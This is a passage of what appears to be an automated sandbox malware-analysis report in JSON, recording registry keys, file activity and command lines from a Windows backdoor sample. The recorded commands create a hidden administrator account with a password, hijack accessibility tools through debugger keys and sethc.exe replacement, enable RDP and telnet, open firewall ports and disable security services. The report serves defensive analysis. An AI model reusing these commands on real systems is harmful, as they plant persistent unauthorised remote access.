"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\NetSh",
"HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows NT\\CurrentVersion\\PeerDist",
"HKEY_LOCAL_MACHINE\\Software\\Policies\\Microsoft\\Internet Explorer\\Main\\FeatureControl",
"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\Licensing Core",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\napagent\\LocalConfig\\Enroll\\HcsGroups\\(Default)",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\PeerDist\\SecurityManager\\Restricted",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\napagent\\LocalConfig\\Enroll\\HcsGroups",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\UserList",
"HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Diagnostics",
"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\NetTrace",
"HKEY_CURRENT_USER\\System\\CurrentControlSet\\Control\\NetTrace\\Session",
"HKEY_LOCAL_MACHINE\\Software\\Policies",
"HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\PeerDist\\CooperativeCaching",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\PeerDist\\SecurityManager",
"HKEY_LOCAL_MACHINE\\system\\CurrentControlSet\\Control\\Terminal Server",
"HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\AutoComplete",
"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\services\\SharedAccess\\Epoch",
"HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\PeerDist\\DownloadManager\\Discovery",
"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\crypt32",
"HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl\\FEATURE_HTTP_USERNAME_PASSWORD_DISABLE",
"HKEY_CURRENT_USER\\Control Panel\\Desktop",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\Magnify.exe",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\PeerDist\\DownloadManager\\UtilityIndex",
"HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Rpc",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SystemRestore",
"HKEY_LOCAL_MACHINE\\Software\\Microsoft\\WBEM\\TextSource\\1",
"HKEY_CURRENT_USER\\Software\\Borland\\Delphi\\Locales",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\CTF\\TIP\\{F89E9E58-BD2F-4008-9AC2-0F816C09F4EE}\\Category\\Category\\{534C48C1-0607-4098-A521-4FC899C73E90}",
"HKEY_CLASSES_ROOT\\.xml",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\PeerDist\\Roaming",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\PeerDist\\DownloadManager\\Download",
"HKEY_LOCAL_MACHINE\\Software\\Policies\\Microsoft\\Windows\\System",
"HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\CTF\\TIP\\{3697C5FA-60DD-4B56-92D4-74A569205C16}\\Category\\Category\\{534C48C1-0607-4098-A521-4FC899C73E90}",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\PeerDist\\DownloadManager\\Upload",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\CTF\\TIP\\{78CB5B0E-26ED-4FCC-854C-77E8F3D1AA80}\\Category\\Category\\{534C48C1-0607-4098-A521-4FC899C73E90}",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\CIMOM",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Cryptography\\Defaults\\Provider\\Microsoft Base Smart Card Crypto Provider",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\PeerDist\\SecurityManager\\Restricted",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Group Policy\\State\\Machine\\GPO-List\\0",
"HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\AutoComplete\\Client\\",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptDllFindOIDInfo\\1.3.6.1.4.1.311.44.3.4!7",
"HKEY_LOCAL_MACHINE\\SYSTEM\\Setup",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\CTF\\TIP\\{A028AE76-01B1-46C2-99C4-ACD9858AE02F}\\Category\\Category\\{534C48C1-0607-4098-A521-4FC899C73E90}",
"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\TermService",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\PeerDist\\DownloadManager\\Upload",
"HKEY_CLASSES_ROOT\\PROTOCOLS\\Name-Space Handler\\file\\",
"HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\MountPoints2\\CPC\\Volume",
"HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl\\FEATURE_MIME_HANDLING",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\PeerDist\\DownloadManager\\UtilityIndex",
"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Wbem\\CIMOM",
"HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Rpc\\SecurityService",
"HKEY_CURRENT_USER\\Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl\\FEATURE_MIME_HANDLING",
"HKEY_CURRENT_USER\\SYSTEM\\CurrentControlSet\\Control\\NetTrace"
],
"file_moved": [
[
"C:\\Windows\\System32\\sethc.exe",
"C:\\Windows\\System32\\sethcr.exe"
],
[
"C:\\Users\\cuck\\AppData\\Local\\Temp\\prop.exe",
"C:\\Windows\\System32\\sethc.exe"
]
],
"file_written": [
"\\\\?\\PIPE\\samr",
"C:\\Windows\\System32\\rdpwrap.ini",
"C:\\Users\\cuck\\AppData\\Local\\Temp\\RDPWInst.exe",
"C:\\Users\\cuck\\AppData\\Local\\Temp\\SH.bat",
"\\\\?\\PIPE\\lsarpc",
"C:\\Windows\\System32\\rdpwrap.dll",
"C:\\Users\\cuck\\AppData\\Local\\Temp\\Pt7.bat",
"C:\\Users\\cuck\\AppData\\Local\\Temp\\prop.exe",
"C:\\Users\\cuck\\AppData\\Local\\Temp\\U.bat",
"C:\\Users\\cuck\\AppData\\Local\\Temp\\rdpwrap.ini"
],
"file_deleted": [
"C:\\Users\\cuck\\AppData\\Local\\Temp\\SH.bat",
"C:\\Windows\\SysWOW64\\sethc.exe",
"C:\\Users\\cuck\\AppData\\Local\\Temp\\Pt7.bat",
"C:\\Windows\\System32\\sethc.exe",
"C:\\Users\\cuck\\AppData\\Local\\Temp\\__tmp_rar_sfx_access_check_34896828",
"C:\\Users\\cuck\\AppData\\Local\\Temp\\U.bat"
],
"file_exists": [
"C:\\Users\\cuck\\AppData\\Local\\Temp\\Reg.exe",
"C:\\Windows\\SysWOW64",
"C:\\Windows\\LastGood\\SysWOW64\\sethc.exe",
"C:\\Windows\\drmsvc.exe",
"C:\\Windows\\LastGood\\system32\\sethc.exe",
"C:\\Users\\cuck\\AppData\\Local\\Temp",
"C:\\Users\\cuck\\AppData\\Local\\Temp\\prop.exe",
"C:\\Users\\cuck\\AppData\\Local\\Temp\\U.bat",
"C:\\Windows\\System32",
"C:\\Windows\\System32\\dllcache\\sethc.exe",
"C:\\Users\\cuck\\AppData\\Local\\Temp\\\n",
"C:\\Windows\\System32\\qagentrt.dll",
"C:\\Users\\cuck\\AppData\\Local\\Temp\\RDPWInst.exe",
"C:\\Windows\\System32\\cmd.exe",
"C:\\Users\\cuck\\AppData\\Local\\Temp\\\"C:\\Users\\cuck\\AppData\\Local\\Temp\\Pt7.bat\"",
"C:\\Users\\cuck\\AppData\\Local\\Temp\\Pt7.bat",
"C:\\Windows\\System32\\tsgqec.dll",
"C:\\Windows\\System32\\fveui.dll",
"C:\\Windows\\SysWOW64\\sethc.exe",
"C:\\Users\\cuck\\AppData\\Local\\Temp\\subinacl.exe",
"C:\\Windows\\System32\\QAGENTRT.DLL",
"C:\\Windows\\System32\\EAPQEC.DLL",
"C:\\Windows\\ServicePackFiles\\i386\\sethc.exe",
"C:\\Windows\\System32\\dnsapi.dll",
"C:\\Windows\\System32\\sethcr.exe",
"C:\\Users\\cuck\\AppData\\Local\\Temp\\rdpwrap.ini",
"C:\\Windows\\System32\\p2pcollab.dll",
"C:\\Users\\cuck\\AppData\\Local\\Temp\\\"C:\\Users\\cuck\\AppData\\Local\\Temp\\U.bat\"",
"C:\\Users\\cuck\\AppData\\Local\\Temp\\SH.bat",
"C:\\Windows\\System32\\wbem\\XSL-Mappings.xml",
"C:\\Windows\\System32\\",
"C:\\Windows\\System32\\dllcache\\wsethc.exe",
"C:\\Windows\\wpmsvc.exe",
"C:\\Windows\\System32\\sethc.exe",
"C:\\Windows\\System32\\napipsec.dll",
"C:\\Users\\cuck\\AppData\\Local\\Temp\\\"C:\\Users\\cuck\\AppData\\Local\\Temp\\SH.bat\"",
"C:\\Windows\\System32\\rdpclip.exe",
"C:\\Windows\\System32\\DHCPQEC.DLL",
"C:\\Windows\\SysWOW64\\dllcache\\sethc.exe"
],
"file_created": [
"C:\\Windows\\System32\\rdpwrap.ini",
"C:\\Users\\cuck\\AppData\\Local\\Temp\\__tmp_rar_sfx_access_check_34896828",
"C:\\Users\\cuck\\AppData\\Local\\Temp\\RDPWInst.exe",
"C:\\Users\\cuck\\AppData\\Local\\Temp\\SH.bat",
"C:\\Windows\\System32\\rdpwrap.dll",
"C:\\Users\\cuck\\AppData\\Local\\Temp\\Pt7.bat",
"C:\\Users\\cuck\\AppData\\Local\\Temp\\prop.exe",
"C:\\Users\\cuck\\AppData\\Local\\Temp\\U.bat",
"C:\\Users\\cuck\\AppData\\Local\\Temp\\rdpwrap.ini"
],
"mutex": [
"Global\\3a886eb8-fe40-4d0a-b78b-9e0bcb683fb7"
],
"file_failed": [
"C:\\Users\\cuck\\AppData\\Local\\Temp\\SH.bat",
"C:\\Windows\\SysWOW64\\sethc.exe",
"C:\\Windows\\System32\\rdpwrap.ini",
"C:\\Windows\\System32\\sethc.exe",
"C:\\Users\\cuck\\AppData\\Local\\Temp\\Pt7.bat",
"C:\\Users\\cuck\\AppData\\Local\\Temp\\U.bat"
],
"wmi_query": [
"SELECT Name FROM Win32_Group WHERE SID = 'S-1-5-32-544'",
"SELECT Name FROM Win32_Group WHERE SID = 'S-1-5-32-555'"
],
"command_line": [
"sc stop wscsvc",
"net start tlntsvr",
"Reg.exe add \"HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Group Policy\\State\\Machine\\Extension-List\\{00000000-0000-0000-0000-000000000000}\" \/v \"StartTimeLo\" \/t REG_DWORD \/d \"2386147405\" \/f",
"Reg Add \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\sethc.exe\" \/v \"debugger\" \/t REG_SZ \/d \"drmsvc.exe\" \/f",
"reg add \"HKLM\\system\\CurrentControlSet\\Control\\Terminal Server\" \/v \"fDenyTSConnections\" \/t REG_DWORD \/d 0x0 \/f",
"net start rasman",
"reg add \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\UserList\" \/v helpassistant \/t REG_DWORD \/d \"00000000\" \/f",
"net user ontar Preaba1! \/add \/active:\"yes\" \/expires:\"never\" \/passwordchg:\"NO\"",
"reg add \"HKLM\\system\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp\" \/v \"MaxConnectionTime\" \/t REG_DWORD \/d 0x1 \/f",
"Reg.exe add \"HKLM\\SYSTEM\\ControlSet001\\services\\SharedAccess\\Epoch\" \/v \"Epoch\" \/t REG_DWORD \/d \"9412\" \/f",
"net localgroup \"Remote Desktop Users\" ontar \/add",
"C:\\Windows\\system32\\net1 accounts \/forcelogoff:no \/maxpwage:unlimited",
"C:\\Windows\\system32\\cmd.exe \/S \/D \/c\" echo Y\"",
"reg add \"HKLM\\system\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp\" \/v \"MaxDisconnectionTime\" \/t REG_DWORD \/d 0x0 \/f",
"C:\\Windows\\system32\\net1 localgroup Administrators ontar \/add",
"cacls C:\\Windows\\SysWOW64\\dllcache\\sethc.exe \/G :F SYSTEM:F ",
"WMIC Group Where \"SID = 'S-1-5-32-544'\" Get Name \/Value ",
"reg add \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\UserList\" \/v ontar \/t REG_DWORD \/d \"00000000\" \/f",
"netsh advfirewall firewall add rule name=\"Remote Desktop\" dir=in protocol=tcp localport=3389 profile=any action=allow",
"sc stop SharedAccess",
"sc config wscsvc start= disabled",
"Reg Add \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\Magnify.exe\" \/v \"debugger\" \/t REG_SZ \/d \"cmd.exe\" \/f",
"Reg.exe add \"HKU\\S-1-5-21-1252767878-4065156067-3399968500-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count\" \/v \"P:\\FUNER\\Iveghny\\Ertfubg.rkr\" \/t REG_BINARY \/d \"1300000002000000100000001a230500000080bf000080bf000080bf000080bf000080bf000080bf000080bf000080bf000080bf000080bfffffffff40e916d87c3bd30100000000\" \/f",
"sc config tlntsvr start= auto",
"netsh firewall add portopening TCP 4899 system",
"net start remoteaccess",
"Reg Add \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\ibhost.exe\" \/v \"debugger\" \/t REG_SZ \/d \"drmsvc.exe\" \/f",
"C:\\Windows\\system32\\cmd.exe \/c WMIC Group Where \"SID = 'S-1-5-32-544'\" Get Name \/Value | Find \"=\"",
"attrib +h +s \"C:\\Documents and settings\\ontar\" \/S \/D",
"C:\\Windows\\system32\\net1 localgroup \"Remote Desktop Users\" ontar \/add",
"net accounts \/forcelogoff:no \/maxpwage:unlimited",
"Reg Add \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\Narrator.exe\" \/v \"debugger\" \/t REG_SZ \/d \"cmd.exe\" \/f",
"net localgroup Administrators ontar \/add",
"Reg Add \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\EOSNotify.exe\" \/v \"debugger\" \/t REG_SZ \/d \"fixmapi.exe\" \/f",
"WMIC Group Where \"SID = 'S-1-5-32-555'\" Get Name \/Value ",
"Reg.exe add \"HKLM\\SYSTEM\\CurrentControlSet\\services\\SharedAccess\\Epoch\" \/v \"Epoch\" \/t REG_DWORD \/d \"9412\" \/f",
"reg add \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\" \/v SFCDisable \/t REG_DWORD \/d \"FFFFFF9D\" \/f",
"C:\\Windows\\system32\\net1 start tlntsvr",
"takeown \/F C:\\Windows\\SysWOW64\\sethc.exe",
"C:\\Windows\\system32\\net1 user ontar Preaba1! \/add \/active:\"yes\" \/expires:\"never\" \/passwordchg:\"NO\"",
"Reg Add \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\utilman.exe\" \/v \"debugger\" \/t REG_SZ \/d \"wpmsvc.exe\" \/f",
"timeout \/T 10 \/NOBREAK",
"cacls C:\\Windows\\System32\\dllcache\\sethc.exe \/G :F SYSTEM:F",
"\"C:\\Users\\cuck\\AppData\\Local\\Temp\\SH.bat\" ",
"C:\\Windows\\system32\\net1 accounts \/maxpwage:unlimited",
"reg add \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SystemRestore\" \/v RPLifeInterval \/t REG_DWORD \/d \"00005180\" \/f",
"Reg Add \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\uddisrw.exe\" \/v \"debugger\" \/t REG_SZ \/d \"wpmsvc.exe\" \/f",
"sc config remoteaccess start= auto",
"C:\\Users\\cuck\\AppData\\Local\\Temp\\U.bat",
"C:\\Windows\\system32\\net1 accounts \/forcelogoff:no",
"Reg.exe add \"HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Group Policy\\Status\\GPExtensions\\{35378EAC-683F-11D2-A89A-00C04FBBCFA2}\" \/v \"LastPolicyTime\" \/t REG_DWORD \/d \"19856934\" \/f",
"reg add \"HKLM\\system\\CurrentControlSet\\Control\\Terminal Server\" \/v \"AllowTSConnections\" \/t REG_DWORD \/d 0x1 \/f",
"Reg Add \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\Windows10Upgrade.exe\" \/v \"debugger\" \/t REG_SZ \/d \"fixmapi.exe\" \/f",
"sc config SharedAccess start= disabled",
"RDPWInst -i -s",
"sc config rasman start= auto",
"C:\\Windows\\system32\\net1 start rasman",
"Reg.exe add \"HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Group Policy\\History\\{35378EAC-683F-11D2-A89A-00C04FBBCFA2}\\0\" \/v \"Version\" \/t REG_DWORD \/d \"196611\" \/f",
"reg add \"HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp\" \/v UserAuthentication \/t REG_DWORD \/d 0x00000000 \/f",
"C:\\Windows\\system32\\cmd.exe \/c WMIC Group Where \"SID = 'S-1-5-32-555'\" Get Name \/Value | Find \"=\"",
"C:\\Users\\cuck\\AppData\\Local\\Temp\\SH.bat",
"C:\\Windows\\system32\\net1 start remoteaccess",
"reg add \"HKLM\\system\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp\" \/v \"MaxIdleTime\" \/t REG_DWORD \/d 0x0 \/f",
"C:\\Users\\cuck\\AppData\\Local\\Temp\\Pt7.bat",
"netsh firewall add portopening TCP 3389 system",
"net accounts \/forcelogoff:no",
"Reg.exe add \"HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows NT\\Terminal Services\" \/v \"UserAuthentication\" \/t REG_DWORD \/d \"0\" \/f",
"Find \"=\"",
"net accounts \/maxpwage:unlimited",
"Reg.exe add \"HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Group Policy\\State\\Machine\\GPO-List\\0\" \/v \"Version\" \/t REG_DWORD \/d \"196611\" \/f",
"takeown \/F C:\\Windows\\System32\\sethc.exe",
"attrib -h -s -r C:\\Windows\\system32\\dllcache",
"sc create tlntsvr binPath= tlntsvr.exe",
"C:\\Windows\\system32\\cmd.exe \/S \/D \/c\" echo y\"",
"reg add \"HKLM\\software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\UserList\" \/v ontar \/t REG_DWORD \/d 0x0 \/f",
"RDPWInst -w",
"\"C:\\Users\\cuck\\AppData\\Local\\Temp\\U.bat\" ",
"attrib C:\\users\\ontar +r +a +s +h",
"Reg.exe add \"HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Group Policy\\State\\Machine\\Extension-List\\{00000000-0000-0000-0000-000000000000}\" \/v \"EndTimeLo\" \/t REG_DWORD \/d \"2387249407\" \/f",
"\"C:\\Users\\cuck\\AppData\\Local\\Temp\\Pt7.bat\" "
],
"file_read": [
"\\\\?\\PIPE\\samr",
"C:\\Windows\\System32\\wbem\\XSL-Mappings.xml",
"C:\\Windows\\win.ini",
"C:\\Users\\cuck\\AppData\\Local\\Temp\\903e0a66880cf6fbf4c39dff9735439084332daebaa2bdfede3b43fcbd60e46a.bin",
"C:\\Users\\cuck\\AppData\\Local\\Temp\\SH.bat",
"\\\\?\\PIPE\\lsarpc",
"C:\\Windows\\System32\\wbem\\textvaluelist.xsl",
"C:\\Users\\cuck\\AppData\\Local\\Temp\\Pt7.bat",
"C:\\Users\\cuck\\AppData\\Local\\Temp\\prop.exe",
"C:\\Users\\cuck\\AppData\\Local\\Temp\\U.bat",
"C:\\Users\\cuck\\AppData\\Local\\Temp\\rdpwrap.ini"
],
"regkey_read": [
"HKEY_CURRENT_USER\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows\\DragDelay",
"HKEY_CURRENT_USER\\Keyboard Layout\\Toggle\\Language Hotkey",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Group Policy\\State\\Machine\\GPO-List\\0\\Version",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptDllFindOIDInfo\\1.3.6.1.4.1.311.44.3.4!7\\Name",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\explorer\\AutoComplete\\Always Use Tab",
"HKEY_CURRENT_USER\\Software\\Microsoft\\Command Processor\\DisableUNCCheck",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\PeerDist\\Service\\PolicyRefreshInProgress",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Rpc\\MaxRpcSize",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Group Policy\\State\\Machine\\Extension-List\\{00000000-0000-0000-0000-000000000000}\\EndTimeLo",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\CTF\\TIP\\{0000897b-83df-4b96-be07-0fb58b01c4a4}\\LanguageProfile\\0x00000000\\{0001bea3-ed56-483d-a2e2-aeae25577436}\\Enable",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\PeerDist\\DiscoveryManager\\DiscoveryProviderDllPath",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptDllFindOIDInfo\\1.3.6.1.4.1.311.67.1.1!7\\Name",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\Windows10Upgrade.exe\\debugger",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\NetTrace\\DebugFlags",
"HKEY_CURRENT_USER\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows\\ScrollDelay",
"HKEY_CURRENT_USER\\Software\\Microsoft\\Command Processor\\DelayedExpansion",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\LDAP\\UseHostnameAsAlias",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\napagent\\Qecs\\79619\\Component Type",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Cryptography\\Defaults\\Provider\\Microsoft Enhanced DSS and Diffie-Hellman Cryptographic Provider\\Type",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Command Processor\\CompletionChar",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\napagent\\Qecs\\79619\\Description",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\Defaults\\Provider\\Microsoft Strong Cryptographic Provider\\Type",
"HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\MountPoints2\\CPC\\Volume\\{3f5cc1b6-70f9-11e8-b07b-806e6f6e6963}\\Data",
"HKEY_LOCAL_MACHINE\\SYSTEM\\Setup\\SystemSetupInProgress",
"HKEY_CURRENT_USER\\Software\\Microsoft\\Command Processor\\EnableExtensions",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptDllFindOIDInfo\\1.3.6.1.4.1.311.44.3.4!7\\Name",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Cryptography\\Defaults\\Provider\\Microsoft RSA SChannel Cryptographic Provider\\Type",
"HKEY_CURRENT_USER\\Keyboard Layout\\Toggle\\Hotkey",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\PeerDist\\Service\\Enable",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\napagent\\Qecs\\79623\\Component Type",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Cryptography\\Defaults\\Provider\\Microsoft Base DSS Cryptographic Provider\\Type",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Setup\\SourcePath",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\napagent\\Qecs\\79617\\Description",
"HKEY_CURRENT_USER\\Local Settings\\MuiCache\\2\\52C64B7E\\@%SystemRoot%\\system32\\napipsec.dll,-4",
"HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\MountPoints2\\CPC\\Volume\\{3f5cc1b5-70f9-11e8-b07b-806e6f6e6963}\\Generation",
"HKEY_CURRENT_USER\\Local Settings\\MuiCache\\2\\52C64B7E\\@%SystemRoot%\\system32\\napipsec.dll,-2",
"HKEY_CURRENT_USER\\Local Settings\\MuiCache\\2\\52C64B7E\\@%SystemRoot%\\system32\\napipsec.dll,-3",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\Defaults\\Provider\\Microsoft RSA SChannel Cryptographic Provider\\Type",
"HKEY_CURRENT_USER\\Local Settings\\MuiCache\\2\\52C64B7E\\@%SystemRoot%\\system32\\napipsec.dll,-1",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\Magnify.exe\\debugger",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\napagent\\Qecs\\79619\\Validator Clsid",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\PeerDist\\HostedCache\\MaxPendingOffers",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\TermService\\ImagePath",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\LDAP\\UseOldHostResolutionOrder",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\CreateUriCacheSize",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\Tcpip\\Parameters\\Domain",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Lsa\\FipsAlgorithmPolicy\\Enabled",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\safer\\codeidentifiers\\SaferFlags",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\DisableImprovedZoneCheck",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\WBEM\\CIMOM\\Logging Directory",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\napagent\\Qecs\\79621\\Enabled",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Internet Explorer\\MAIN\\FeatureControl\\FEATURE_MIME_HANDLING\\*",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\.xml\\Content Type",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Group Policy\\State\\Machine\\Extension-List\\{00000000-0000-0000-0000-000000000000}\\StartTimeLo",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\napagent\\Qecs\\79619\\Enabled",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Cryptography\\Defaults\\Provider\\Microsoft Base Smart Card Crypto Provider\\Type",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Terminal Server\\fDenyTSConnections",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\napagent\\LocalConfig\\Tracing Level",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\CustomLocale\\EMPTY",
